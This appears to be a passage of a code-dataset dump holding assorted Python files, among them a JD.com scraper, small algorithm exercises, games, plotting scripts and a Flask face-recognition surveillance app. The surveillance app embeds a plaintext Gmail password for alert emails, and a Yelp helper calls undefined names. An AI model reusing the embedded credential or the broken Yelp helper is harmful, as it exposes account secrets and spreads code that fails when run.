driver.find_element_by_id(\"J_bottomPage\")\n driver.execute_script(\"arguments[0].scrollIntoView();\", target)\n time.sleep(random.randint(1, 2))\n\ndef pagedown():\n if isExist('//a[@class=\"pn-next\"]'):\n next_btn = driver.find_element_by_xpath('//a[@class=\"pn-next\"]')\n next_btn.click()\n time.sleep(random.randint(2, 3))\n else:\n pass\n\ndef getlink(total_page, link_file):\n for q in range(int(total_page)):\n loaditem()\n if isExist('//*[@id=\"message_layer\"]'):\n msg_24g = driver.find_element_by_id(\"message_layer\")\n while msg_24g.is_displayed():\n time.sleep(1)\n print(\"有弹窗\")\n else:\n pass\n # 获取和写入链接\n if isExist('//li[@class=\"gl-item\"]/div/div[@class=\"p-img\"]/a'):\n parents = driver.find_elements_by_xpath('//li[@class=\"gl-item\"]/div/div[@class=\"p-img\"]/a')\n print('第{}页-共{}个元素'.format(q+1, len(parents)))\n for i in range(len(parents)):\n url = parents[i].get_attribute('href')\n link_file.write(url+\"\\n\")\n # 输入翻至下一页\n if q+1 < int(total_page):\n pagedown()\n\ndef start():\n try: # 关键词填入框中并点击>>>获取总页数>>>拉到底部点击下一页>>>抽取所需要的信息\n search = wait.until(EC.presence_of_element_located((By.XPATH, '//input[@clstag=\"h|keycount|head|search_a\"]')))\n search.clear()\n search.send_keys(keyword)\n if isExist('//button[@clstag=\"h|keycount|head|search_c\"]'):\n sub_btn = wait.until(EC.element_to_be_clickable((By.XPATH, '//button[@clstag=\"h|keycount|head|search_c\"]')))\n sub_btn.click()\n time.sleep(random.randint(2, 3))\n else:\n pass # 备用\n # 筛选排序标签\n sort_span = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"J_filter\"]/div[1]/div[1]/a[2]/span')))\n sort_span.click()\n time.sleep(0.2)\n total_page = wait.until(EC.presence_of_element_located((By.XPATH, '//span[@class=\"fp-text\"]'))).text.split('/')[-1]\n print(\"详情数据总共{}页\".format(total_page))\n getlink(total_page, link_file)\n time_end = time.time()\n time_cost = time_end-time_start\n print('京东{}页-{}链接已全部写入!\\n'.format(total_page, keyword))\n print('本次花费{}分{}秒'.format(time_cost//60, time_cost%60))\n print('>>>>>>>>>>All Done!<<<<<<<<<<<')\n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n start()\n link_file.close()","sub_path":"Proj_getData/GetLink/jd_sort_100.py","file_name":"jd_sort_100.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"627378311","text":"# -*- coding:utf-8 -*-\r\n\r\n\r\n# @version: 1.0\r\n# @author: daichi\r\n# @date: '14-12-08'\r\n\r\n\r\nimport os\r\nimport zipfile\r\n\r\nfrom yzs_utils.environment import Environment\r\nfrom dao.export_sql_helper import ExportSqlHelper\r\nfrom flight_crawler.flight_schedule_crawler import FlightScheduleCrawler\r\nfrom util.flight_data_exporter import FlightDataExporter\r\nfrom util.uploader import Uploader\r\n\r\n\r\ndef export_sql():\r\n sql_name = ExportSqlHelper.exportSql()\r\n zip_file(sql_name, sql_name.replace('.sql', '.zip'))\r\n\r\n\r\ndef zip_file(file_name, zip_file_name):\r\n z = zipfile.ZipFile(zip_file_name, 'w', zipfile.ZIP_DEFLATED)\r\n z.write(file_name)\r\n os.remove(file_name)\r\n\r\n\r\ndef upload(file_name):\r\n uploader = Uploader()\r\n for retry_time in range(3):\r\n if uploader.upload_file(file_name, \"flight\"):\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Environment.get_instance().init_by_file_name(os.getcwd(), \"flight_crawler_main.py\")\r\n crawler = FlightScheduleCrawler(\"conf/qunar_configure.conf\", \"conf/ctrip_configure.conf\", loggingConfigureFileName=\"conf/logging.conf\")\r\n crawler.run()\r\n flight_data_exporter = FlightDataExporter(\"conf/configure.conf\")\r\n export_file_name = flight_data_exporter.export()\r\n upload(export_file_name)\r\n\r\n\r\n\r\n","sub_path":"data-auto-updater-projects/flight_schedule/flight_crawler_main.py","file_name":"flight_crawler_main.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"173787780","text":"from random import randint\nfrom copy import deepcopy\n\nmax_array_size = 100\n\n\ndef estimatetime(func):\n from time import perf_counter\n\n def wrapper(*args, **kwargs):\n st_time = perf_counter()\n ret = func(*args, **kwargs)\n e_time = perf_counter() - st_time\n print('*' * 40)\n print('Time Estimation --')\n print('Method name : ' + str(func.__name__))\n print('Estimated time : ' + str(e_time))\n print('*' * 40)\n return ret\n\n return wrapper\n\n\n@estimatetime\ndef counting_sort(array: list):\n \"\"\"\n 計数ソート\n 計算量 O(n + k)\n \"\"\"\n maxp = max(array)\n newarr = [0] * (maxp)\n pos = [0] * (maxp)\n pos[0] = 0\n\n for i in array:\n newarr[i - 1] += 1\n\n for i in range(1, maxp):\n pos[i] = pos[i - 1] + newarr[i - 1]\n\n answer = [None] * (len(array))\n\n for k in range(0, len(array)):\n target = array[k]\n answer[pos[target-1]] = target\n pos[target-1] += 1\n\n return answer\n\n\ngenerated_array = [randint(1, 5) for i in range(0, (max_array_size))]\n\ncopied = deepcopy(generated_array)\nsorted_array = counting_sort(copied)\ngenerated_array.sort()\n\nprint('Sorted array : ' + str(generated_array))\nprint('Sorted array : ' + str(sorted_array))\nprint('is sorting completely done? : ' + str(generated_array == sorted_array) )","sub_path":"algorithms/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"486117300","text":"def getIdx(cha):\n return ord(cha) - 64\n\ndef solution(msg):\n answer = []\n dictionary = [[] for _ in range(27)]\n\n idx = 0\n\n while idx < len(msg):\n #한글자식 비교하면서 등록되어 있는지 확인한다\n nowIdx = getIdx(msg[idx])\n nowDict = dictionary[nowIdx]\n \n while idx < len(msg):\n next = False\n idx += 1\n \n #마지막 글자라면 어차피 다음에 탐색할게 없으니 종료한다\n if idx >= len(msg):\n break\n\n for nextChar, nextIdx in nowDict:\n if nextChar == msg[idx]:\n next = True\n nowDict = dictionary[nextIdx]\n nowIdx = nextIdx\n break\n \n if not next:\n #다음 문자가 없으면 해당 문자를 추가해준다\n nowDict.append([msg[idx], len(dictionary)])\n dictionary.append([])\n break\n \n answer.append(nowIdx)\n\n return answer\n\nprint(solution(\"KAKAO\"))\nprint(solution(\"TOBEORNOTTOBEORTOBEORNOT\"))\nprint(solution(\"ABABABABABABABAB\"))","sub_path":"PROGRAMMERS/Level 2/[3차] 압축_python/CodingTest.py","file_name":"CodingTest.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203385947","text":"import numpy as np\nimport utils\nimport os\nimport re\n\n\ndef get_dag_galaxy():\n node_names = ['Y{}'.format(i) for i in range(20)]\n\n n = len(node_names)\n adj_matrix = np.zeros((n, n))\n\n path = r'C:\\Users\\gtx97\\Google Drive\\2019-2020_2_UNC_DATA\\acflow\\AstarLasso\\networks'\n with open(os.path.join(path, 'getDAGgalaxy.m'), 'r') as file:\n data = file.readlines()\n\n string = ''.join(data)\n\n pattern = r'\\(\\d+\\,\\d+\\)'\n\n res = re.findall(pattern, string)\n\n res = [x[1:-1].split(',') for x in res]\n res = [[int(a) - 1 for a in x] for x in res]\n res = np.array(res)\n rows, cols = np.split(res, indices_or_sections=2, axis=1)\n adj_matrix[rows, cols] = 1\n\n top_order = utils.topological_permutation(adj_matrix)\n\n return adj_matrix, node_names, top_order\n","sub_path":"networks/get_dag_galaxy.py","file_name":"get_dag_galaxy.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"197219798","text":"def yelp_request(host, path, api_key, url_params=None):\n import requests\n\n #prepare request\n url_params = url_params or {}\n url = '{0}{1}'.format(host, path)\n headers = {'Authorization': 'Bearer %s' %api_key}\n\n #print status\n #print(u'Querying {0} ...'.format(url))\n\n #make the request\n response = requests.get(url=url, params=url_params, headers=headers)\n\n return response.json()\n\n\ndef yelp_num_records(yelp_key, lat, lon, category):\n import pandas as pd\n import numpy as np\n import os\n\n base_path = 'https://api.yelp.com'\n search_path = '/v3/businesses/search'\n #business_path = '/v3/businesses/' #business ID comes after this\n\n #Set the initial search parameters\n search_params = {'latitude': lat,\n 'longitude': lon,\n 'radius': 16094,\n 'limit': 50,\n 'offset': 0,\n 'categories': category,\n 'term': None,\n 'price': [1,2,3,4]}\n\n #Change price parameters based on category\n if (category == 'restaurants') | (category == 'bars'):\n search_params.update({'price': [2,3,4]})\n else:\n pass\n\n #Query the API to find the total number of businesses that meet search parameters\n try:\n num_records = yelp_request(host=base_path, path=search_path, api_key=yelp_key, url_params=search_params)['total']\n except:\n num_records = np.NaN\n\n return num_records\n\n\ndef yelp_ratings(yelp_key, num_records):\n import pandas as pd\n import numpy as np\n import os\n import requests\n from python_pkg import python_udf as udf\n\n base_path = 'https://api.yelp.com'\n search_path = '/v3/businesses/search'\n business_path = '/v3/businesses/' #business ID comes after this\n\n #initialize everything needed for loops\n offset_value = 0\n output = {}\n\n #Because API only returns a subset of the total businesses, must call the API repeatedly to get everything\n while offset_value <= num_records:\n #query the API\n request_output = request(host=base_path, path=search_path, api_key=yelp_key, url_params=search_params)\n\n #loop through all entities in the request\n for b in request_output['businesses']:\n #initialize a dictionary to hold the data for the specific business\n specific_dict = {}\n name = b['alias']\n specific_dict['review_count'] = b['review_count']\n specific_dict['rating'] = b['rating']\n #add specific business to the overall dictionary using the business name as the key\n output[name] = specific_dict\n\n #update counter\n offset_value += search_params['limit']\n #update search parameters\n search_params.update({'offset': offset_value})\n\n #convert to dataframe\n df = pd.DataFrame(output).transpose().reset_index().astype({'rating': 'category', 'review_count': 'int64'})\n\n\n\n rating_df = df.groupby(by='rating', as_index=False).agg({'review_count': 'sum'})\n\n rating_df['weight'] = rating_df['review_count'] / rating_df['review_count'].sum()\n sum(rating_df['rating'].astype('float64') * rating_df['weight'])\n\n\n\n grouped_df = df.groupby(by='rating').agg({'rating': 'count', 'review_count': 'sum'}).rename(columns={'rating': 'rating_count'})\\\n .reset_index().astype({'rating': 'float64'})\n grouped_df['review_per_business'] = grouped_df['review_count'] / grouped_df['rating_count']\n avg_rating = sum(grouped_df['rating'] * (grouped_df['rating_count'] / grouped_df['rating_count'].sum()))\n\n sum(avg_rating * (grouped_df['review_per_business'] / grouped_df['review_per_business'].sum()))\n\n\n\n\n# from python_pkg import python_udf as udf\n# yelp_key = udf.read_key('C:/Users/Joe/Documents/API_keys.json', 'yelp')\n# lat = [32.7157, 43.0731]\n# lon = [-117.1611, -89.4012]\n# category = 'restaurants'\n\n# for la, lo in zip(lat, lon):\n# print(yelp_num_records(yelp_key, la, lo, category))\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"data_pipelines/yelp.py","file_name":"yelp.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"310443192","text":"import pygame\nimport sys\nimport os\n\n'''\nObjects\n'''\n\n\nclass Player(pygame.sprite.Sprite):\n '''\n 生成玩家\n '''\n\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.movex = 0\n self.movey = 0\n self.frame = 0\n self.images = []\n for i in range(1, 5):\n img = pygame.image.load(os.path.join('images', 'hero' + str(i) + '.png')).convert()\n img.convert_alpha()\n img.set_colorkey(ALPHA)\n self.images.append(img)\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n\n def control(self, x, y):\n '''\n 控制玩家移动\n '''\n self.movex += x\n self.movey += y\n\n def update(self):\n '''\n 更新妖精位置\n '''\n\n self.rect.x = self.rect.x + self.movex\n self.rect.y = self.rect.y + self.movey\n\n # 向左移动\n if self.movex < 0:\n self.frame += 1\n if self.frame > 3 * ani:\n self.frame = 0\n self.image = self.images[self.frame // ani]\n\n # 向右移动\n if self.movex > 0:\n self.frame += 1\n if self.frame > 3 * ani:\n self.frame = 0\n self.image = self.images[(self.frame // ani) + 4]\n\n\n'''\n设置\n'''\nworldx = 960\nworldy = 720\n\nfps = 40 # 帧刷新率\nani = 4 # 动画循环\nclock = pygame.time.Clock()\npygame.init()\nmain = True\n\nBLUE = (25, 25, 200)\nBLACK = (23, 23, 23)\nWHITE = (254, 254, 254)\nALPHA = (0, 255, 0)\n\nworld = pygame.display.set_mode([worldx, worldy])\nbackdrop = pygame.image.load(os.path.join('images', 'stage.png')).convert()\nbackdropbox = world.get_rect()\nplayer = Player() # 生成玩家\nplayer.rect.x = 0\nplayer.rect.y = 0\nplayer_list = pygame.sprite.Group()\nplayer_list.add(player)\nsteps = 10 # 移动速度\n\n'''\n主循环\n'''\nwhile main == True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit();\n sys.exit()\n main = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT or event.key == ord('a'):\n player.control(-steps, 0)\n if event.key == pygame.K_RIGHT or event.key == ord('d'):\n player.control(steps, 0)\n if event.key == pygame.K_UP or event.key == ord('w'):\n print('jump')\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == ord('a'):\n player.control(steps, 0)\n if event.key == pygame.K_RIGHT or event.key == ord('d'):\n player.control(-steps, 0)\n if event.key == ord('q'):\n pygame.quit()\n sys.exit()\n main = False\n\n # world.fill(BLACK)\n world.blit(backdrop, backdropbox)\n player.update()\n player_list.draw(world) # 更新玩家位置\n pygame.display.flip()\n clock.tick(fps)\n","sub_path":"myflask/venv/gametest.py","file_name":"gametest.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"137399951","text":"import networkx as nx\nimport parse as p\nfrom random import random, choice\n\nG = nx.Graph()\npath = \"inputsSubmission/\"\ninputs = {\"25.in\": 25, \"50.in\": 50, \"100.in\": 100}\n\nfor filename, size in inputs.items():\n G.add_nodes_from(range(size))\n while not nx.is_connected(G):\n start = choice(list(G.nodes()))\n end = choice(list(nx.non_neighbors(G, start)))\n weight = round(random() * 100, 3)\n G.add_edge(start, end)\n G[start][end]['weight'] = weight\n print(\"=== \" + filename + \" ===\")\n print(\"Graph has \" + str(len(list(G.nodes()))) + \" nodes and \" + str(len(list(G.edges()))) + \" edges.\")\n print(\"Graph is connected: \" + str(nx.is_connected(G)))\n print(\"Write to file: \" + path + filename)\n p.write_input_file(G, path + filename)\n G.clear()\n print()\n\n\n\n\n\n","sub_path":"inputsSubmission.py","file_name":"inputsSubmission.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"493470472","text":"# Write your code here\nfrom random import choice\n\nprint(\"H A N G M A N\\n\")\n\nlist_of_words = ['python', 'java', 'kotlin', 'javascript']\nthe_word = choice(list_of_words)\n\n\"\"\"\nhint = ''\nfor index, character in enumerate(the_word):\n if index <= 2:\n hint += character\n else:\n hint += '-'\n# test hint\n# print(hint)\n\nuser_guess = input(\"Guess the word {hint}: \".format(hint=hint))\n\"\"\"\nstarting_hint = ''\nfor index, character in enumerate(the_word):\n starting_hint += '-'\n\n\n\nnum_letter_to_guess = len(the_word)\nnum_tries = 8\nuser_attempts = 0\nitter_count = 0\nhint = []\n# rename later : hold correct user guesses\nuser_letters_guess_list = []\n# rename later: hold incorrect user guess\nall_guess = []\nis_guess_complete = False\nexit_message = \"Thanks for playing\\nWe'll see how well you did in the next stage\"\nstart_game = False\nis_deciding_to_play = True\n# menu\nwhile is_deciding_to_play:\n player_decision_to_play = input(\"Type \\\"play\\\" to play the game,\\\"exit\\\" to quit:\")\n if player_decision_to_play == 'play':\n # set start game bool to true to activate the game loop\n start_game = True\n # set is_deciding_to_play to false, to exit the start game menu\n is_deciding_to_play = False\n elif player_decision_to_play == 'exit':\n # don't start the game, but do exit the game menu\n is_deciding_to_play = False\n else:\n # gave an answer other than the two options re-prompt question\n continue\n\n\n# game loop\nwhile user_attempts < num_tries and start_game:\n #print(\"value of user_attemps\", user_attempts)\n # check if user guess is complete\n # num check will be used to count the number correct guess\n # being currently made\n num_check = 0\n for letter in the_word:\n if letter in user_letters_guess_list:\n num_check += 1\n\n # when num check is equal to the length of the word\n if num_check == len(the_word):\n # set ... to true\n is_guess_complete = True\n\n # reset num_letter_to_guess to redo the calc or\n # else the result will go into negative\n num_letter_to_guess = len(the_word)\n for index, letter in enumerate(user_letters_guess_list):\n if letter in the_word:\n num_letter_to_guess -= 1\n # print(\"is_guess_complete value: \", is_guess_complete)\n # print(\"num_letter_to_guess: \", num_letter_to_guess)\n\n if num_letter_to_guess == 0:\n # print(\"num_letter_to_guess: \", num_letter_to_guess)\n # print(\"is_guess_complete value: \", is_guess_complete)\n is_guess_complete = True\n\n if is_guess_complete:\n user_attempts += 1\n else:\n # handle user input loop\n # print the guess\n try: hint_string\n except NameError:\n print(starting_hint)\n else:\n print(hint_string.strip())\n\n # ask for input\n user_letter_guess = input(\"Input a letter:\").rstrip()\n if len(user_letter_guess) != 1 or not(user_letter_guess.isalpha() and user_letter_guess.islower()):\n # enter the correct message based on the wrong formatting\n if len(user_letter_guess) != 1:\n print(\"You should input a single letter\")\n if not(user_letter_guess.isalpha() and user_letter_guess.islower()):\n print(\"Please enter a lowercase English letter\")\n\n if not(is_guess_complete) and user_attempts != 8:\n print()\n # print(\"a\")\n # start the game loop over input is not right\n continue\n else:\n # print(\"passed checking input, starting game\")\n # input is good, continue with the game loop\n # check if the letter has already been guessed\n if user_letter_guess in user_letters_guess_list or user_letter_guess in all_guess:\n print(\"You've already guessed this letter\")\n if not(is_guess_complete) and user_attempts != 8:\n print()\n #print('b')\n # restart input, letter's already been guessed\n # print()\n continue\n\n # letter has not been guessed yet, continue the game\n # for format create a newline between input and guess\n \"\"\"\n need to count the occurnes of the user_letter_guess\n in the_word and add it to the \n user_letters_guess_list that many times\n should be able to use .count method for that.\n \"\"\"\n for num_adds in range(the_word.count(user_letter_guess)):\n user_letters_guess_list.append(user_letter_guess)\n # print(user_letters_guess_list)\n # test it\n else:\n # if it doesn't show up in the word then add it to\n all_guess.append(user_letter_guess)\n\n if user_letter_guess in the_word:\n # print(\"letter is in the word\")\n if not(is_guess_complete) and user_attempts != 8:\n # hint\n try: hint_string\n except NameError:\n print()\n else:\n \"\"\"\n count number of blanks left in hint\n hint_string.count('-')\n count the number of time the user_guess_letter\n shows up in the word\n the_word.count(user.guess_letter)\n \n if they are equal then it's the final correct guess\n so don't print the empty line\n \"\"\"\n if hint_string.count('-') != the_word.count(user_letter_guess):\n print()\n #print('c')\n # create hint\n if len(hint) == 0:\n # print(\"len hint is\", len(hint))\n for index, character in enumerate(the_word):\n if user_letter_guess == character:\n hint.append(character)\n else:\n hint.append('-')\n else:\n for word_index, word_letter in enumerate(the_word):\n if user_letter_guess == word_letter:\n # hint.insert(word_index, user_letter_guess)\n hint[word_index] = user_letter_guess\n # print(hint)\n\n hint_string = ''\n for letter in hint:\n hint_string += letter\n\n # check hint string\n # print(hint_string)\n else:\n print(\"That letter doesn't appear in the word\")\n user_attempts += 1\n if not(is_guess_complete) and user_attempts != 8:\n #print(user_attempts)\n print()\n # print('d')\n # print()\nelse:\n if player_decision_to_play == 'play':\n # print(\"is_guess_complete value: \", is_guess_complete)\n print(f\"You guessed the word {the_word}!\\nYou survived!\" if is_guess_complete == True else \"You lost!\")\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546044414","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\ndf = pd.read_csv('data_tasks.csv')\nprint(df)\nprint(df.values[:,1])\ntimePoint=df.values[:,0]\ntemp=df.values[:,1]\nstDev=df.values[:,2]\nplt.figure(1)\nplt.errorbar(timePoint,temp,yerr=stDev,fmt=\"r8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.legend([\"Temperature with Standard Deviation\"],numpoints=1,loc=(\"upper left\"))\nplt.xlim((0,10))\nplt.xticks([1,2,3,4,5,6,7,8,9])\nplt.yticks([0,5,10,15,20])\nplt.title(\"Temperature Over Time\",fontsize=24)\nplt.xlabel('Time(Minutes)',fontweight = 'bold')\nplt.ylabel('Temperature (C)', fontweight = 'bold')\nplt.show()\n#plt.savefig('filename.png',dpi=600)\n\nplt.figure(2)\nplt.bar(timePoint,temp,yerr=stDev,align=\"center\",ecolor='k',capsize=8)\nplt.xticks([1,2,3,4,5,6,7,8,9])\nplt.yticks([0,5,10,15,20])\nplt.title(\"Temperature Over Time\",fontsize=24)\nplt.xlabel('Time(Minutes)',fontweight = 'bold')\nplt.ylabel('Temperature (C)', fontweight = 'bold')\nplt.show()\n#plt.savefig('filename.png',dpi=600)\n\n#### accidently split the file when I turned it into a csv, so have to read in twice, one for each sheet. This can be fixed by adding df=pd.read_excel('data_task.xlsx',sheet_name=...)\ndr=pd.read_csv('data_tasks2.csv')\nprint(dr)\ndef strToInt(lst):\n newLst=[]\n for i in lst:\n i = int(i)\n newLst.append(i)\n return newLst\ntime=strToInt(dr.values[1:,0])\nlvTemp=strToInt(dr.values[1:,1])\nlvStDev=strToInt(dr.values[1:,2])\ndgTemp=strToInt(dr.values[1:,3])\ndgStDev=strToInt(dr.values[1:,4])\ndTemp=strToInt(dr.values[1:,5])\ndStDev=strToInt(dr.values[1:,6])\nplt.figure(3)\nplt.errorbar(time,lvTemp,yerr=lvStDev,fmt=\"r8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.errorbar(time,dgTemp,yerr=dgStDev,fmt=\"g8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.errorbar(time,dTemp,yerr=dStDev,fmt=\"b8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.legend([\"Las Vegas\",\"Durango\",\"Denver\"],numpoints=2,loc=(\"upper left\"))\nplt.xlim((0,7))\nplt.xticks([1,2,3,4,5,6])\nplt.yticks([0,5,10,15,20,25,30,35,40,45,50])\nplt.title(\"Temperature Over Time\",fontsize=24)\nplt.xlabel('Time(Hours)',fontweight = 'bold')\nplt.ylabel('Temperature (C)', fontweight = 'bold')\nplt.show()\n#plt.savefig('filename.png',dpi=600)\nplt.figure(4)\nbarWidth = 0.25\nr1= np.arange(len(lvTemp))\nr2= [x+barWidth for x in r1]\nr3= [x+barWidth for x in r2]\nplt.bar(r1,lvTemp, color='#7f6d5f', width = barWidth, edgecolor = 'white', label = 'Las Vegas',yerr=lvStDev,capsize=5)\nplt.bar(r2,dgTemp, color='#557f2d', width = barWidth, edgecolor = 'white', label = 'Durango',yerr=dgStDev,capsize=5)\nplt.bar(r3,dTemp, color='#2d7f5e', width = barWidth, edgecolor = 'white', label = 'Denver',yerr=dStDev,capsize=5)\nplt.title('Temperature Over Time', fontsize=24)\nplt.xlabel('Time(Hours)',fontweight='bold')\nplt.ylabel('Temperature (C)', fontweight='bold')\nplt.xticks([r + barWidth for r in range(len(lvTemp))],[1,2,3,4,5,6])\nplt.legend()\nplt.show()\n#plt.savefig('filename.png',dpi=600)\n\n\n\n\n\n","sub_path":"hw18.py","file_name":"hw18.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229469981","text":"import multiprocessing\nimport pymongo\nfrom pymongo import MongoClient\nfrom flask import Flask, request, jsonify\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport os\nimport json\nimport smtplib, ssl\nfrom flask_cors import CORS\nimport psutil\nimport subprocess\nimport time\nfrom binascii import a2b_base64\nimport atexit\napp = Flask(__name__)\nCORS(app)\nsender_email = \"rajlohith2@gmail.com\"\nreceiver_email = \"bharadwajkarthik7@gmail.com\"\nport = 465 # For SSL\npassword = \"virendersehwag\"\ncameraIPList = [0]\njobList = []\ncontext = ssl.create_default_context()\ncurrentNewUser = 0\ncrim_list = {}\n\n\ndef trainData():\n path = 'dataset'\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n print (\"\\n [INFO] Training faces. It will take a few seconds. Wait ...\")\n faces,ids = getImagesAndLabels(path)\n recognizer.train(faces, np.array(ids))\n\n # Save the model into trainer/trainer.yml\n recognizer.write('trainer/trainer.yml') # recognizer.save() worked on Mac, but not on Pi\n\n # Print the numer of faces trained and end program\n print(\"\\n [INFO] {0} faces trained. Exiting Program\".format(len(np.unique(ids))))\n\n\ndef trainDataAndRecognize(c_list,pid):\n path = 'dataset'\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n print (\"\\n [INFO] Training faces. It will take a few seconds. Wait ...\")\n faces,ids = getImagesAndLabels(path)\n recognizer.train(faces, np.array(ids))\n\n # Save the model into trainer/trainer.yml\n recognizer.write('trainer/trainer.yml') # recognizer.save() worked on Mac, but not on Pi\n\n # Print the numer of faces trained and end program\n print(\"\\n [INFO] {0} faces trained. Exiting Program\".format(len(np.unique(ids))))\n p = multiprocessing.Process(target = performPrediction,args = (\" \",0, c_list, pid))\n p.start()\n\n\ndef recordCriminalFaceData(filename, cameraIP, face_id):\n if filename == \" \":\n cam = cv2.VideoCapture(0)\n else:\n cam = cv2.VideoCapture(filename)\n\n cam.set(3, 640) # set video width\n cam.set(4, 480) # set video height\n\n face_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n print(\"\\n [INFO] Initializing face capture. Look the camera and wait ...\")\n # Initialize individual sampling face count\n count = 0\n\n while(True):\n time.sleep(0.1)\n ret, img = cam.read()\n #img = cv2.flip(img, -1) # flip video image vertically\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(img, (x,y), (x+w,y+h), (255,0,0), 2) \n count += 1\n\n # Save the captured image into the datasets folder\n cv2.imwrite(\"dataset/User.\" + str(face_id) + '.' + str(count) + \".jpg\", gray[y:y+h,x:x+w])\n if filename == \" \":\n if count >= 60:\n break\n\n # Do a bit of cleanup\n print(\"\\n [INFO] Exiting Program and cleanup stuff\")\n cam.release()\n\ndef performPredictionFromVideo(filepath):\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n recognizer.read('trainer/trainer.yml')\n cascadePath = \"haarcascade_frontalface_default.xml\"\n faceCascade = cv2.CascadeClassifier(cascadePath)\n #iniciate id counter\n id = 0\n\n # names related to ids: example ==> Marcelo: id=1, etc\n names = ['None', 'veer', 'Lohith', 'Ganapati', 'Z', 'W']\n cam = cv2.VideoCapture(filepath)\n # Initialize and start realtime video capture\n cam.set(3, 640) # set video widht\n cam.set(4, 480) # set video height\n\n # Define min window size to be recognized as a face\n minW = 0.1*cam.get(3)\n minH = 0.1*cam.get(4)\n\n while True:\n\n #img = cv2.flip(img, -1) # Flip vertically\n try:\n ret, img =cam.read()\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n except:\n return(crim_list)\n\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor = 1.2,\n minNeighbors = 5,\n minSize = (int(minW), int(minH)),\n )\n\n for(x,y,w,h) in faces:\n\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\n\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\n\n # Check if confidence is less them 100 ==> \"0\" is perfect match \n if (confidence < 100):\n confidence = int(round(100 - confidence))\n if int(confidence) >= 50:\n print(id)\n print(confidence)\n if id in c_list:\n if crim_list[id] Marcelo: id=1, etc\n names = ['None', 'Lohith', 'Lohith', 'Ganapati', 'Z', 'W']\n if filename == \" \":\n cam = cv2.VideoCapture(0)\n else:\n cam = cv2.VideoCapture(filename)\n # Initialize and start realtime video capture\n cam.set(3, 640) # set video widht\n cam.set(4, 480) # set video height\n\n # Define min window size to be recognized as a face\n minW = 0.1*cam.get(3)\n minH = 0.1*cam.get(4)\n\n while True:\n time.sleep(0.1)\n ret, img =cam.read()\n #img = cv2.flip(img, -1) # Flip vertically\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor = 1.2,\n minNeighbors = 5,\n minSize = (int(minW), int(minH)),\n )\n\n for(x,y,w,h) in faces:\n\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\n\n # Check if confidence is less them 100 ==> \"0\" is perfect match \n if (confidence < 100 & id != 4):\n confidence = int(round(100 - confidence))\n if int(confidence) >= 25:\n if id in c_list:\n if c_list[id]NUL')\n return jsonify({})\n\n@app.route('/release-camera')\ndef release():\n p = multiprocessing.Process(target = performPrediction,args = (\" \",0, c_list, pid))\n p.start()\n return \" \"\n@app.route('/recording')\ndef recordRealTime():\n os.popen('TASKKILL /PID '+str(pid[0])+' /F 2>NUL')\n filter = {} \n collection = db[\"trial_new\"]\n doc_count = collection.count_documents(filter)\n currentNewUser = doc_count + 1\n recordCriminalFaceData(\" \", 0, currentNewUser)\n p2 = multiprocessing.Process(target = trainDataAndRecognize, args = (c_list, pid))\n p2.start()\n return jsonify({})\n\n@app.route('/recording-from-footage')\ndef recordingFromFootage():\n face_id = request.args['userid']\n 